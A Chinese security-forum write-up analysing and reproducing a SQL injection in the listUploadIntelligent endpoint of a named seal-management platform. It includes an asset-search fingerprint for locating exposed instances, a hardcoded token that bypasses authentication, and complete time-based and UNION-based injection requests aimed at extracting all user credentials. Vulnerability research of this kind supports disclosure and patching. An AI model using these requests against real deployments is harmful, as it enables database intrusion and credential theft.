问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
某管家印章智慧管理平台 listUploadIntelligent接口sql注入漏洞分析与复现
漏洞分析
listUploadIntelligent接口存在 SQL 注入漏洞。攻击者可以通过构造特定的 POST 请求注入恶意 SQL 代码,利用该漏洞对数据库执行任意 SQL 操作,获取所有用户的账户密码信息。
一.漏洞描述 ------ listUploadIntelligent接口存在 SQL 注入漏洞。攻击者可以通过构造特定的 POST 请求注入恶意 SQL 代码,利用该漏洞对数据库执行任意 SQL 操作,获取所有用户的账户密码信息。 二.资产测绘 ------ ```js app="章管家-印章智慧管理平台" ``` ![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-a050ebb9dac168525dafc68eb4d3ff6496e45665.png) 三.漏洞分析 ------ 1、首先有 这个 listUploadIntelligent 关键字,先用全局搜索工具搜一下 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-1d9e56ef95aa5c3051a3d371798310bfb24039cd.png) 2、定位到ROOT\\WEB-INF\\classes\\com\\shjysoft\\api\\app\\AppMessageController.class 下的class文件,使用idea打开查看源码 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-b8303ff031ae0ab2ac3fe3091f1d3487d4569c5a.png) 3、首先源码中声明了路由为:/app/message/listUploadIntelligent.htm,且传参有:pageNo、pageSize、keyWord、startDate、endDate、deptIds、type\_id、is\_read,且方法自带参数有person\_id、unit\_id 4、接着往下看,queryMap会将前端传参全部存储,然后queryMap直接进入searchUploadIntelligentByRead方法,顾名思义,应该是查询操作,进入看代码 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-23fa0f0a151ac29e3de9c30cbe34fecdbf43b7b9.png) 5、进来一看,好家伙直接3个sql语句摆在眼前。第一个太长了有点麻烦,本着简单的原则,直接选第二个进行分析 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-562d0359836a99294e226f65a049042faddf2b55.png) 6、第二个sql语句if条件很简单,只要is\_read值不为空,即拼接sql。而sql最后面,is\_read值直接拼接了sql,为数字型注入点 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-d99aa4b965db2a535821319c625043daea079afe.png) 四.漏洞复现 ------ 1、回到本地 搭建的环境,构造一下请求发包: ```js POST /app/message/listUploadIntelligent.htm?&person_id=1&unit_id=1 HTTP/1.1 Host:127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 119 pageNo=1&pageSize=20&keyWord=&startDate=&endDate=&deptIds=&type_id=&is_read=-1 and (select*from(select%0Asleep(10))x) ``` 2、报错 Token无效,请重新登录。再使用文件搜索工具搜一下token,在main.jsp中找到token值为dingtalk\_token,再次构造: ![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-ee760c485c3ac1b90370d795cbd9abe173bcca8d.png) ![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-8fb5152edf5e6c3d9b00af3a13d2e9ceceb155a6.png) 3、poc1: ```js POST /app/message/listUploadIntelligent.htm?token=dingtalk_token&person_id=1&unit_id=1 HTTP/1.1 Host:127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 119 pageNo=1&pageSize=20&keyWord=&startDate=&endDate=&deptIds=&type_id=&is_read=-1 and (select*from(select%0Asleep(10))x) ``` ![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-a6afe30846e125622834a1cd13c995e95b01abbb.png) 4、当然,不是所有的站点 延时注入payload都一定通用。如果是编写扫描脚本,建议最好使用or 1=1 ,这样不容易漏掉。 ![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-871ea96bb3a75a398d8b066d7e23b49482a751e5.png) 5、同样,此注入也支持联合注入,字段数为12: poc2: ```js POST /app/message/listUploadIntelligent.htm?token=dingtalk_token&person_id=1&unit_id=1 HTTP/1.1 Host:127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Connection: close Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 131 pageNo=1&pageSize=20&keyWord=&startDate=&endDate=&deptIds=&type_id=&is_read=-1 union select md5(123456),2,3,4,5,6,7,8,9,10,11,12 -- ``` ![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-aa570b760f4f0f6a2219f6a081e429566b304035.png)
发表于 2024-08-13 11:48:20
阅读 ( 4659 )
分类:
Web应用
1 推荐
收藏
0 条评论
请先
登录
后评论
dddtest
2 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!